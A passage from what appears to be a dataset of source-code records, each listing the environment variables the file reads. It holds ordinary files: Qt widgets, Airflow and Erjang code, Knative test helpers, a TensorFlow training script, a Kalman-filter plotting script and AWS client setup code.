user_profil_url[name] = api.get_user(name).profile_image_url
urllib.request.urlretrieve(user_profil_url[name],f"{name}.png")
else:
urllib.request.urlretrieve(user_profil_url[name],f"{name}.png")
except:
continue
bg = Image.new("RGBA", (1000,1000),color="yellow")
img = Image.open(f"{target_username}.png")
img_w, img_h = img.size
bg_w, bg_h = bg.size
offset = ((bg_w - img_w) // 2, (bg_h - img_h) //2)
full_circle = math.pi * 2
max_score = max(list(interacted_users.values()))
def map(old_value,old_min, old_max, new_min, new_max):
return (((old_value - old_min) * (new_max - new_min)) / (old_max - old_min)) + new_min
for name, score in interacted_users.items():
try:
random_angle = random.random() * full_circle
length = 1 - score / max_score
length = map(length, 0, 1, img_w, bg_w / 2 - img_w / 2)
x = math.cos(random_angle) * length
y = math.sin(random_angle) * length
x += bg_w / 2
y += bg_h / 2
print(x)
print(y)
bg.paste(Image.open(f"{name}.png"),(int(x),int(y)))
except Exception as e:
print(e)
print(name)
bg.paste(img,offset)
bg.save("result.png")
for path in glob.glob("*.png"):
if "result" not in path:
os.remove(path)
| []
| []
| [
"CONSUMER_KEY",
"CONSUMER_SECRET",
"ACCESS_TOKEN_SECRET",
"ACCESS_TOKEN"
]
| [] | ["CONSUMER_KEY", "CONSUMER_SECRET", "ACCESS_TOKEN_SECRET", "ACCESS_TOKEN"] | python | 4 | 0 | |
avalon/tools/widgets.py | import logging
from . import lib
from .models import AssetModel, RecursiveSortFilterProxyModel
from .views import DeselectableTreeView
from ..vendor import qtawesome
from ..vendor.Qt import QtWidgets, QtCore, QtGui
from .. import style
from .. import io
log = logging.getLogger(__name__)
class AssetWidget(QtWidgets.QWidget):
"""A Widget to display a tree of assets with filter
To list the assets of the active project:
>>> # widget = AssetWidget()
>>> # widget.refresh()
>>> # widget.show()
"""
silo_changed = QtCore.Signal(str) # on silo combobox change
assets_refreshed = QtCore.Signal() # on model refresh
selection_changed = QtCore.Signal() # on view selection change
current_changed = QtCore.Signal() # on view current index change
def __init__(self, silo_creatable=True, parent=None):
super(AssetWidget, self).__init__(parent=parent)
self.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(4)
# Header
header = QtWidgets.QHBoxLayout()
silo = SiloTabWidget(silo_creatable=silo_creatable)
icon = qtawesome.icon("fa.refresh", color=style.colors.light)
refresh = QtWidgets.QPushButton(icon, "")
refresh.setToolTip("Refresh items")
header.addWidget(silo)
header.addStretch(1)
header.addWidget(refresh)
# Tree View
model = AssetModel()
proxy = RecursiveSortFilterProxyModel()
proxy.setSourceModel(model)
proxy.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
view = DeselectableTreeView()
view.setIndentation(15)
view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
view.setHeaderHidden(True)
view.setModel(proxy)
filter = QtWidgets.QLineEdit()
filter.textChanged.connect(proxy.setFilterFixedString)
filter.setPlaceholderText("Filter assets..")
# Layout
layout.addLayout(header)
layout.addWidget(filter)
layout.addWidget(view)
# Signals/Slots
selection = view.selectionModel()
selection.selectionChanged.connect(self.selection_changed)
selection.currentChanged.connect(self.current_changed)
silo.silo_changed.connect(self._on_silo_changed)
refresh.clicked.connect(self.refresh)
self.refreshButton = refresh
self.silo = silo
self.model = model
self.proxy = proxy
self.view = view
def _on_silo_changed(self):
"""Callback for silo change"""
self._refresh_model()
silo = self.get_current_silo()
self.silo_changed.emit(silo)
self.selection_changed.emit()
def _refresh_model(self):
silo = self.get_current_silo()
with lib.preserve_expanded_rows(self.view,
column=0,
role=self.model.ObjectIdRole):
with lib.preserve_selection(self.view,
column=0,
role=self.model.ObjectIdRole):
self.model.set_silo(silo)
self.assets_refreshed.emit()
def refresh(self):
silos = _list_project_silos()
self.silo.set_silos(silos)
self._refresh_model()
def get_current_silo(self):
"""Returns the currently active silo."""
return self.silo.get_current_silo()
def get_active_asset(self):
"""Return the asset id the current asset."""
current = self.view.currentIndex()
return current.data(self.model.ObjectIdRole)
def get_active_index(self):
return self.view.currentIndex()
def get_selected_assets(self):
"""Return the assets' ids that are selected."""
selection = self.view.selectionModel()
rows = selection.selectedRows()
return [row.data(self.model.ObjectIdRole) for row in rows]
def set_silo(self, silo):
"""Set the active silo tab"""
self.silo.set_current_silo(silo)
def select_assets(self, assets, expand=True):
"""Select assets by name.
Args:
assets (list): List of asset names
expand (bool): Whether to also expand to the asset in the view
Returns:
None
"""
# TODO: Instead of individual selection optimize for many assets
assert isinstance(assets,
(tuple, list)), "Assets must be list or tuple"
# Clear selection
selection_model = self.view.selectionModel()
selection_model.clearSelection()
# Select
mode = selection_model.Select | selection_model.Rows
for index in lib.iter_model_rows(self.proxy,
column=0,
include_root=False):
data = index.data(self.model.ItemRole)
name = data["name"]
if name in assets:
selection_model.select(index, mode)
if expand:
self.view.expand(index)
# Set the currently active index
self.view.setCurrentIndex(index)
class SiloTabWidget(QtWidgets.QTabBar):
"""Silo widget
Allows to add a silo, with "+" tab.
Note:
When no silos are present an empty stub silo is added to
use as the "blank" tab to start on, so the + tab becomes
clickable.
"""
silo_changed = QtCore.Signal(str)
silo_added = QtCore.Signal(str)
def __init__(self, silo_creatable=True, parent=None):
super(SiloTabWidget, self).__init__(parent=parent)
self.silo_creatable = silo_creatable
self._previous_tab_index = -1
self.set_silos([])
self.setContentsMargins(0, 0, 0, 0)
self.setFixedHeight(28)
font = QtGui.QFont()
font.setBold(True)
self.setFont(font)
self.currentChanged.connect(self.on_tab_changed)
def on_tab_changed(self, index):
if index == self._previous_tab_index:
return
# If it's the last tab
num = self.count()
if self.silo_creatable and index == num - 1:
self.on_add_silo()
self.setCurrentIndex(self._previous_tab_index)
return
silo = self.tabText(index)
self.silo_changed.emit(silo)
# Store for the next calls
self._previous_tab_index = index
def clear(self):
"""Removes all tabs.
Implemented similar to `QTabWidget.clear()`
"""
for i in range(self.count()):
self.removeTab(0)
def set_silos(self, silos):
current_silo = self.get_current_silo()
if not silos:
# Add an emtpy stub tab to start on.
silos = [""]
# Populate the silos without emitting signals
self.blockSignals(True)
self.clear()
for silo in sorted(silos):
self.addTab(silo)
if self.silo_creatable:
# Add the "+" tab
self.addTab("+")
self.set_current_silo(current_silo)
self.blockSignals(False)
# Assume the current index is "fine"
self._previous_tab_index = self.currentIndex()
# Only emit a silo changed signal if the new signal
# after refresh is not the same as prior to it (e.g.
# when the silo was removed, or alike.)
if current_silo != self.get_current_silo():
self.currentChanged.emit(self.currentIndex())
def set_current_silo(self, silo):
"""Set the active silo by name or index.
Args:
silo (str or int): The silo name or index.
"""
# Already set
if silo == self.get_current_silo():
return
# Otherwise change the silo box to the name
for i in range(self.count()):
text = self.tabText(i)
if text == silo:
self.setCurrentIndex(i)
break
def get_current_silo(self):
index = self.currentIndex()
return self.tabText(index)
def on_add_silo(self):
silo, state = QtWidgets.QInputDialog.getText(self,
"Silo name",
"Create new silo:")
if not state or not silo:
return
self.add_silo(silo)
def get_silos(self):
"""Return the currently available silos"""
# Ignore first tab if empty
# Ignore the last tab because it is the "+" tab
silos = []
for i in range(self.count() - 1):
label = self.tabText(i)
if i == 0 and not label:
continue
silos.append(label)
return silos
def add_silo(self, silo):
# Add the silo
silos = self.get_silos()
silos.append(silo)
silos = list(set(silos)) # ensure unique
self.set_silos(silos)
self.silo_added.emit(silo)
self.set_current_silo(silo)
def _list_project_silos():
"""List the silos from the project's configuration"""
silos = io.distinct("silo")
if not silos:
project = io.find_one({"type": "project"})
log.warning("Project '%s' has no active silos", project["name"])
return list(sorted(silos))
| []
| []
| []
| [] | [] | python | null | null | null |
airflow/__main__.py | #!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Main executable module"""
import os
import argcomplete
from airflow.cli import cli_parser
from airflow.configuration import conf
def main():
"""Main executable function"""
if conf.get("core", "security") == 'kerberos':
os.environ['KRB5CCNAME'] = conf.get('kerberos', 'ccache')
os.environ['KRB5_KTNAME'] = conf.get('kerberos', 'keytab')
parser = cli_parser.get_parser()
argcomplete.autocomplete(parser)
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
main()
| []
| []
| [
"KRB5_KTNAME",
"KRB5CCNAME"
]
| [] | ["KRB5_KTNAME", "KRB5CCNAME"] | python | 2 | 0 | |
src/main/java/erjang/ErjangCodeCache.java | /** -*- tab-width: 4 -*-
* This file is part of Erjang - A JVM-based Erlang VM
*
* Copyright (c) 2011 by Trifork
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
**/
package erjang;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.Map;
import java.util.Queue;
import java.util.jar.JarOutputStream;
import java.util.logging.Logger;
import java.util.zip.ZipEntry;
import erjang.beam.BeamLoader;
import erjang.beam.Compiler;
import erjang.beam.RamClassRepo;
public class ErjangCodeCache {
static final Logger log = Logger.getLogger("erjang.beam.cache");
// Config:
static final String ERJ_CACHE_DIR;
static final boolean useAsyncPersisting;
static final boolean useSyncPersisting;
static final Persister persister;
static {
String cacheDir = System.getenv("ERJ_CACHE_DIR");
if (cacheDir == null) cacheDir = System.getProperty("user.home");
ERJ_CACHE_DIR = cacheDir;
String mode = System.getProperty("erjang.codecache.mode");
if ("async".equals(mode)) {
useAsyncPersisting = true;
useSyncPersisting = false;
} else if ("sync".equals(mode)) {
useAsyncPersisting = false;
useSyncPersisting = true;
} else if ("off".equals(mode)) {
useAsyncPersisting = false;
useSyncPersisting = false;
} else {
// TODO: Warn?
// Default to 'async':
useAsyncPersisting = true;
useSyncPersisting = false;
} // Other values which might make sense: 'read-only', 'existing-only'
if (useAsyncPersisting) {
persister = new Persister();
Thread t = new Thread(persister, "Erjang Code Cache Persister");
t.setDaemon(true);
t.setPriority(Thread.MIN_PRIORITY);
t.start();
} else persister = null;
}
private static Map<String, RamClassRepo> cache = Collections.synchronizedMap(new HashMap<String, RamClassRepo>());
public static EModuleClassLoader getModuleClassLoader(String moduleName, EBinary beam_data, BeamLoader beam_parser) throws IOException {
long crc = beam_data.crc();
// crc ^= BIFUtil.all_bif_hash();
File jarFile = new File(erjdir(), moduleJarFileName(moduleName, crc));
if (jarFile.exists()) {
return new EModuleClassLoader(jarFile.toURI().toURL());
}
RamClassRepo repo = new RamClassRepo();
try {
Compiler.compile(beam_parser.load(beam_data.getByteArray()), repo);
repo.close();
cache.put(moduleName, repo);
if (useAsyncPersisting) persister.enqueue(jarFile, repo);
else if (useSyncPersisting) persister.persist(jarFile, repo);
} finally {
try {repo.close();
// jarFile.delete();
} catch (Exception e) {}
}
return new EModuleClassLoader(jarFile.toURI().toURL(), repo);
}
static File erjdir() throws IOException {
File home = ERT.newFile(ERJ_CACHE_DIR);
File dir = new File(home, ".erjang");
if (!dir.exists()) {
if (!dir.mkdirs())
throw new IOException("cannot create " + dir);
} else if (!dir.canWrite()) {
throw new IOException("cannot write to " + dir);
}
return dir;
}
public static String moduleJarFileName(String moduleName, long crc) {
return moduleFileName(moduleName, crc, "jar");
}
/*
static String moduleJarBackupFileName(String moduleName, long crc) {
return moduleFileName(moduleName, crc, "ja#");
}
*/
static String moduleFileName(String moduleName, long crc, String extension) {
return mangle(moduleName)
+ "-" + Long.toHexString(crc)
+ "." + extension;
}
/** Mangle string so that the result contains only [a-z0-9_$]. */
static String mangle(String s) {
// TODO: Faster handling of the normal case.
StringBuffer sb = new StringBuffer();
for (int i=0; i<s.length(); i++) {
char c = s.charAt(i);
if (('a' <= c && c <= 'z') ||
('A' <= c && c <= 'Z') ||
('0' <= c && c <= '9') ||
c == '-' ||
c == '.' ||
c == '_')
sb.append(c);
else
sb.append('$').append(Integer.toHexString(c)).append('$');
}
return sb.toString();
}
static class PersistRequest { // Just a Pair<File,RamClassRepo>, really.
final File file;
final RamClassRepo repo;
public PersistRequest(File file, RamClassRepo repo) {
this.file = file;
this.repo = repo;
}
}
static class Persister implements Runnable {
final Queue<PersistRequest> queue = new LinkedList<PersistRequest>();
public void run() {
while (true) {
PersistRequest request;
synchronized (queue) {
while ((request = queue.poll()) == null) {
try { queue.wait(); }
catch (InterruptedException ie) {}
}
}
persist(request.file, request.repo);
}
}
void enqueue(File file, RamClassRepo repo) {
synchronized (queue) {
queue.add(new PersistRequest(file, repo));
queue.notify();
}
}
static void persist(File file, RamClassRepo repo) {
try {
File tmpFile = File.createTempFile(file.getName(), "tmp",
file.getParentFile());
JarOutputStream jo = new JarOutputStream(new FileOutputStream(tmpFile));
jo.setLevel(0);
for (Map.Entry<String,byte[]> e : repo.entrySet()) {
String classFilename = e.getKey() + ".class";
byte[] classContents = e.getValue();
jo.putNextEntry(new ZipEntry(classFilename));
jo.write(classContents);
jo.closeEntry();
}
jo.close();
tmpFile.renameTo(file);
} catch (IOException ioe) {
log.warning("Warning: Failed to store cached module in "+file);
}
}
}
}
| [
"\"ERJ_CACHE_DIR\""
]
| []
| [
"ERJ_CACHE_DIR"
]
| [] | ["ERJ_CACHE_DIR"] | java | 1 | 0 | |
my_tiny_ekf/graph_maker.py |
# * MakeGraphUsingTinyEKFDLL
# *
# * Copyright (C) 2022 DukiChoi
# *
# * MIT License
# -*- coding: utf-8 -*-
from calendar import c
from inspect import _void
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
# Data Load
import serial
import time
import signal
import threading
import ctypes
from ctypes import *
import os
#os.add_dll_directory(os.getcwd())
os.environ['PATH'] = './lib.dll' + os.pathsep + os.environ['PATH']
i = c_double(0)
pi = pointer(i)
x = []
y = []
z = []
port = 'COM6'
baud = 9600
exitThread = False
# %%
# ANIMATION FUNCTION
def func(num, dataSet, line, redDots):
# NOTE: there is no .set_data() for 3 dim data...
line.set_data(dataSet[0:2, :num])
line.set_3d_properties(dataSet[2, :num])
redDots.set_data(dataSet[0:2, :num])
redDots.set_3d_properties(dataSet[2, :num])
return line
# %%
def handler(signum, frame):
exitThread = True
# 데이터 처리할 함수
def parsing_data(data):
tmp = ''.join(data)
print(tmp)
# 본 쓰레드
def readThread(ser):
global line
global exitThread
global x
global y
global z
while not exitThread:
idx = 0
for c in ser.read():
if idx % 3 == 0:
x.append(float(c))
elif idx % 3 == 1:
y.append(float(c))
else:
z.append(float(c))
idx = idx + 1
# %% [markdown]
#
# %% [markdown]
#
# %%
# %%
if __name__ == "__main__":
# %%
# 종료 시그널 등록
# signal.signal(signal.SIGINT, handler)
#
# ser = serial.Serial(port, baud, timeout=0)
# if ser.readable():
# res = ser.readline()
# # print(res)
#
# thread = threading.Thread(target=readThread, args=(ser,))
# thread.start()
#
# plot
#pd array형태로 csv파일 읽어오기
#####여기서 txt명과 데이터 개수를 적어주세요#####
##############################################
file_name = "circle_test2"
##############################################
#데이터 개수 바꾸려면 dll다시 설정해야함 기본 100개 데이터로 설정해둠.
data_amount = 100
#csv로 바꿔주고 9축 데이터 읽어옴
df = pd.read_csv('./test_files/' + file_name + '.txt', sep = '\t')
df.to_csv(r'./test_files/'+ file_name + '.csv')
new_df = pd.read_csv('./test_files/'+ file_name + '.csv')
m = new_df.values
#print(m)
data_matrix1 = m[0:data_amount, 3:6].astype(np.float64)
data_matrix2 = m[0:data_amount, 6:9].astype(np.float64)
data_matrix3 = m[0:data_amount, 13:16].astype(np.float64)
print("입력값 A행렬:\n" , data_matrix1)
print("입력값 W행렬:\n" , data_matrix2)
print("입력값 H행렬:\n" , data_matrix3)
#입력 배열 포인터에 할당하기
filter1 = np.array(data_matrix1, dtype=np.float64)
pointer_a = filter1.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter2 = np.array(data_matrix2, dtype=np.float64)
pointer_b = filter2.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter3 = np.array(data_matrix3, dtype=np.float64)
pointer_c = filter3.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
#ctypes를 이용해서 dll 라이브러리의 함수에 9축 데이터를 3개의 array배열 입력 1개의 array배열 출력
print("Dll function call")
libc = ctypes.CDLL('./Dll_lib.dll')
#함수 입력 형식 900개 double값
libc.make_string.argtypes = {ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3))}
#함수 출력 형식 300개 double값
libc.make_string.restype = ctypes.POINTER(ctypes.c_double*(data_amount*3))
arrayptr = libc.make_string(pointer_a, pointer_b, pointer_c)
c_array = [x for x in arrayptr.contents]
print("S행렬 출력: ", len(c_array), "개 \n", c_array)
# #여기는 실험영역...
# # ctypes로 python배열에서 c++ 포인터 배열로 바꾸기. c++로 구현해야함.
# filter = np.array([[1, 0, 1], [1, 0, 1], [1, -1, 0]], dtype=np.float64)
# a = filter.ctypes.data_as(ctypes.POINTER(ctypes.c_double*9))
# print([x for x in a.contents])
#c_array 값 출력
idx =0
for c in c_array:
if idx %3 ==0 :
x.append(c)
elif idx%3 ==1:
y.append(c)
elif idx%3 ==2:
z.append(c)
idx = idx + 1
dataSet = np.array([x, y, z])
#print(x)
#print(y)
#print(z)
numDataPoints = 100
# GET SOME MATPLOTLIB OBJECTS
fig = plt.figure()
ax = Axes3D(fig)
redDots = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='r', marker='o')[0] # For scatter plot
# NOTE: Can't pass empty arrays into 3d version of plot()
line = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='g')[0] # For line plot
# AXES PROPERTIES]
ax.set_xlim3d([-10, 10])
ax.set_ylim3d([-10, 10])
ax.set_zlim3d([-10, 10])
ax.set_xlabel('X(t)')
ax.set_ylabel('Y(t)')
ax.set_zlabel('Z(t)')
ax.set_title('Trajectory of electron for E vector along [120]')
# Creating the Animation object
line_ani = animation.FuncAnimation(fig, func, frames=numDataPoints, fargs=(dataSet, line, redDots), interval=50,
blit=False)
# line_ani.save(r'Animation.mp4')
plt.show()
| []
| []
| [
"PATH"
]
| [] | ["PATH"] | python | 1 | 0 | |
lib/test/integration.go | // Copyright 2019 The Knative Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package test
import (
"fmt"
"os"
"regexp"
"strconv"
"strings"
"sync"
"testing"
"time"
)
const (
MaxRetries int = 10
RetrySleepDuration time.Duration = 5 * time.Second
)
var nsMutex sync.Mutex
var serviceMutex sync.Mutex
var serviceCount int
var namespaceCount int
// KnTest type
type KnTest struct {
namespace string
kn Kn
}
// NewKnTest creates a new KnTest object
func NewKnTest() (*KnTest, error) {
ns := ""
// try next 20 namespace before giving up creating a namespace if it already exists
for i := 0; i < 20; i++ {
ns = NextNamespace()
err := CreateNamespace(ns)
if err == nil {
break
}
if strings.Contains(err.Error(), "AlreadyExists") {
continue
} else {
return nil, err
}
}
err := WaitForNamespaceCreated(ns)
if err != nil {
return nil, err
}
return &KnTest{
namespace: ns,
kn: Kn{ns},
}, nil
}
// Teardown clean up
func (test *KnTest) Teardown() error {
return DeleteNamespace(test.namespace)
}
// Kn object used by this KnTest
func (test *KnTest) Kn() Kn {
return test.kn
}
// Namespace used by the test
func (test *KnTest) Namespace() string {
return test.namespace
}
// Public functions
// NextNamespace return the next unique namespace
func NextNamespace() string {
ns := os.Getenv("KN_E2E_NAMESPACE")
if ns == "" {
ns = "kne2etests"
}
return fmt.Sprintf("%s%d", ns, GetNextNamespaceId())
}
// GetNextNamespaceId return the next unique ID for the next namespace
func GetNextNamespaceId() int {
nsMutex.Lock()
defer nsMutex.Unlock()
current := namespaceCount
namespaceCount++
return current
}
// GetNextServiceName return the name for the next namespace
func GetNextServiceName(base string) string {
serviceMutex.Lock()
defer serviceMutex.Unlock()
current := serviceCount
serviceCount++
return base + strconv.Itoa(current)
}
// CreateNamespace creates and tests a namesspace creation invoking kubectl
func CreateNamespace(namespace string) error {
expectedOutputRegexp := fmt.Sprintf("namespace?.+%s.+created", namespace)
out, err := createNamespaceWithRetry(namespace, MaxRetries)
if err != nil {
return fmt.Errorf("could not create namespace %s: %w", namespace, err)
}
// check that last output indeed show created namespace
matched, err := matchRegexp(expectedOutputRegexp, out)
if err != nil {
return err
}
if !matched {
return fmt.Errorf("Expected output incorrect, expecting to include:\n%s\n Instead found:\n%s\n", expectedOutputRegexp, out)
}
return nil
}
// DeleteNamespace deletes and tests a namesspace deletion invoking kubectl
func DeleteNamespace(namespace string) error {
kubectl := Kubectl{namespace}
out, err := kubectl.Run("delete", "namespace", namespace)
if err != nil {
return fmt.Errorf("Cannot delete namespace %s: %w", namespace, err)
}
expectedOutputRegexp := fmt.Sprintf("namespace?.+%s.+deleted", namespace)
matched, err := matchRegexp(expectedOutputRegexp, out)
if err != nil {
return err
}
if !matched {
return fmt.Errorf("Expected output incorrect, expecting to include:\n%s\n Instead found:\n%s\n", expectedOutputRegexp, out)
}
return nil
}
// WaitForNamespaceDeleted wait until namespace is deleted
func WaitForNamespaceDeleted(namespace string) error {
deleted := checkNamespace(namespace, false, MaxRetries)
if !deleted {
return fmt.Errorf("error deleting namespace %s, timed out after %d retries", namespace, MaxRetries)
}
return nil
}
// WaitForNamespaceCreated wait until namespace is created
func WaitForNamespaceCreated(namespace string) error {
created := checkNamespace(namespace, true, MaxRetries)
if !created {
return fmt.Errorf("error creating namespace %s, timed out after %d retries", namespace, MaxRetries)
}
return nil
}
func CurrentDir(t *testing.T) string {
dir, err := os.Getwd()
if err != nil {
t.Fatal("Unable to read current dir:", err)
}
return dir
}
// Private functions
func checkNamespace(namespace string, created bool, maxRetries int) bool {
retries := 0
for retries < MaxRetries {
output, _ := Kubectl{}.Run("get", "namespace")
// check for namespace deleted
if !created && !strings.Contains(output, namespace) {
return true
}
// check for namespace created
if created && strings.Contains(output, namespace) {
return true
}
retries++
time.Sleep(RetrySleepDuration)
}
return true
}
func createNamespaceWithRetry(namespace string, maxRetries int) (string, error) {
var (
retries int
err error
out string
)
for retries < maxRetries {
out, err = Kubectl{}.Run("create", "namespace", namespace)
if err == nil {
return out, nil
}
retries++
time.Sleep(RetrySleepDuration)
}
return out, err
}
func matchRegexp(matchingRegexp, actual string) (bool, error) {
matched, err := regexp.MatchString(matchingRegexp, actual)
if err != nil {
return false, fmt.Errorf("failed to match regexp %q: %w", matchingRegexp, err)
}
return matched, nil
}
| [
"\"KN_E2E_NAMESPACE\""
]
| []
| [
"KN_E2E_NAMESPACE"
]
| [] | ["KN_E2E_NAMESPACE"] | go | 1 | 0 | |
train.py | # -*- coding: utf-8 -*-
import os
import tensorflow as tf
import shutil
from deeplabv3plus import model
from dataset import Dataset
from config import cfg
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
log = cfg.TRAIN.LOGDIR
EPOCHS = cfg.TRAIN.EPOCHS
save_every_n_epoch = cfg.TRAIN.SAVE_EPOCH
if os.path.exists(log): shutil.rmtree(log)
if __name__ == '__main__':
# GPU settings
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
TrainSet = Dataset('train')
model = model(depthwise=True, backbone='mobilenetv2')
if os.listdir('./saved_weights'):
latest_weight = tf.train.latest_checkpoint('./saved_weights')
# latest_weight = r"./saved_model/epoch-14"
model.load_weights(latest_weight)
# define loss and optimizer
loss_object = tf.keras.losses.SparseCategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam(lr=1e-5)
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')
miou = tf.keras.metrics.MeanIoU(num_classes=21, name='miou')
summary_writer = tf.summary.create_file_writer(logdir='tensorboard') # 实例化记录器
tf.summary.trace_on(profiler=True)
# @tf.function
def train_step(image_batch, label_batch):
with tf.GradientTape() as tape:
predictions = model(image_batch)
loss = loss_object(y_true=label_batch, y_pre=predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, model.trainable_variables))
train_loss.update_state(values=loss)
train_accuracy.update_state(y_true=label_batch, y_pred=predictions)
miou.update_state(y_true=label_batch, y_pred=tf.argmax(predictions, axis=-1))
# start training
step = 0
for epoch in range(EPOCHS):
for img, labels in TrainSet:
train_step(img, labels)
print("Epoch: {}/{}, step:{}, loss: {:.5f}, accuracy: {:.5f}, miou: {:.5f}".format(epoch + 1,
EPOCHS,
step,
train_loss.result().numpy(),
train_accuracy.result().numpy(),
miou.result().numpy()))
with summary_writer.as_default():
tf.summary.scalar("loss", train_loss.result().numpy(), step=step)
step += 1
if (epoch+1) % save_every_n_epoch == 0:
model.save_weights(filepath='./saved_model' + "/epoch-{}".format(epoch), save_format='tf')
tf.saved_model.save(model, 'FCN8s.h5')
'''
optimizer = tf.keras.optimizers.Adam(learning_rate=1e-6)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,
metrics=[tf.keras.metrics.CategoricalAccuracy(name='accuracy'),
tf.keras.metrics.MeanIoU(num_classes=21, name="meanIoU")],
experimental_run_tf_function=False
)
model.fit_generator(TrainSet, steps_per_epoch=416, epochs=10)
model.save_weights('./deeplabv3plus')
'''
| []
| []
| [
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
chaosaws/__init__.py | # -*- coding: utf-8 -*-
import os
from typing import Any, Dict, List
import boto3
import requests
from aws_requests_auth.aws_auth import AWSRequestsAuth
from aws_requests_auth.boto_utils import BotoAWSRequestsAuth
from botocore import parsers
from chaosaws.types import AWSResponse
from chaoslib.discovery.discover import (discover_actions, discover_probes,
initialize_discovery_result)
from chaoslib.exceptions import DiscoveryFailed, InterruptExecution
from chaoslib.types import (Configuration, DiscoveredActivities,
DiscoveredSystemInfo, Discovery, Secrets)
from logzero import logger
__version__ = '0.15.1'
__all__ = ["__version__", "discover", "aws_client", "signed_api_call"]
def get_credentials(secrets: Secrets = None) -> Dict[str, str]:
"""
Credentialss may be provided via the secrets object. When they aren't,
they will be loaded from the process environment (for instance, read from
`~/.aws/credentials`).
See: https://boto3.readthedocs.io/en/latest/guide/configuration.html#guide-configuration
""" # noqa: E501
creds = dict(
aws_access_key_id=None, aws_secret_access_key=None,
aws_session_token=None)
if secrets:
creds["aws_access_key_id"] = secrets.get("aws_access_key_id")
creds["aws_secret_access_key"] = secrets.get("aws_secret_access_key")
creds["aws_session_token"] = secrets.get("aws_session_token")
return creds
def aws_client(resource_name: str, configuration: Configuration = None,
secrets: Secrets = None):
"""
Create a boto3 client for the given resource.
You may pass the `aws_region` key in the `configuration` object to
be explicit about which region you want to use.
You may pass `aws_profile_name` value to the `configuration` object so that
we load the appropriate profile to converse with the AWS services. In that
case, make sure your local `~/aws/credentials` config is properly setup, as
per https://boto3.readthedocs.io/en/latest/guide/configuration.html#aws-config-file
Also, if you want to assume a role, you should setup that file as per
https://boto3.readthedocs.io/en/latest/guide/configuration.html#assume-role-provider
as we do not read those settings from the `secrets` object.
""" # noqa: E501
configuration = configuration or {}
aws_profile_name = configuration.get("aws_profile_name")
aws_assume_role_arn = configuration.get("aws_assume_role_arn")
params = get_credentials(secrets)
region = configuration.get("aws_region")
if not region:
logger.debug(
"The configuration key `aws_region` is not set, looking in the "
"environment instead for `AWS_REGION` or `AWS_DEFAULT_REGION`")
region = os.getenv("AWS_REGION", os.getenv("AWS_DEFAULT_REGION"))
if not region:
raise InterruptExecution("AWS requires a region to be set!")
if region:
logger.debug("Using AWS region '{}'".format(region))
params["region_name"] = region
if boto3.DEFAULT_SESSION is None:
# we must create our own session so that we can populate the profile
# name when it is provided. Only create the default session once.
boto3.setup_default_session(profile_name=aws_profile_name, **params)
if not aws_assume_role_arn:
logger.debug(
"Client will be using profile '{}' from boto3 session".format(
aws_profile_name or "default"))
return boto3.client(resource_name, **params)
else:
logger.debug(
"Fetching credentials dynamically assuming role '{}'".format(
aws_assume_role_arn))
aws_assume_role_session_name = configuration.get(
"aws_assume_role_session_name")
if not aws_assume_role_session_name:
aws_assume_role_session_name = "ChaosToolkit"
logger.debug(
"You are missing the `aws_assume_role_session_name` "
"configuration key. A unique one was generated: '{}'".format(
aws_assume_role_session_name))
client = boto3.client('sts', **params)
params = {
"RoleArn": aws_assume_role_arn,
"RoleSessionName": aws_assume_role_session_name
}
response = client.assume_role(**params)
creds = response['Credentials']
logger.debug(
"Temporary credentials will expire on {}".format(
creds["Expiration"].isoformat()))
params = {
"aws_access_key_id": creds['AccessKeyId'],
"aws_secret_access_key": creds['SecretAccessKey'],
"aws_session_token": creds['SessionToken']
}
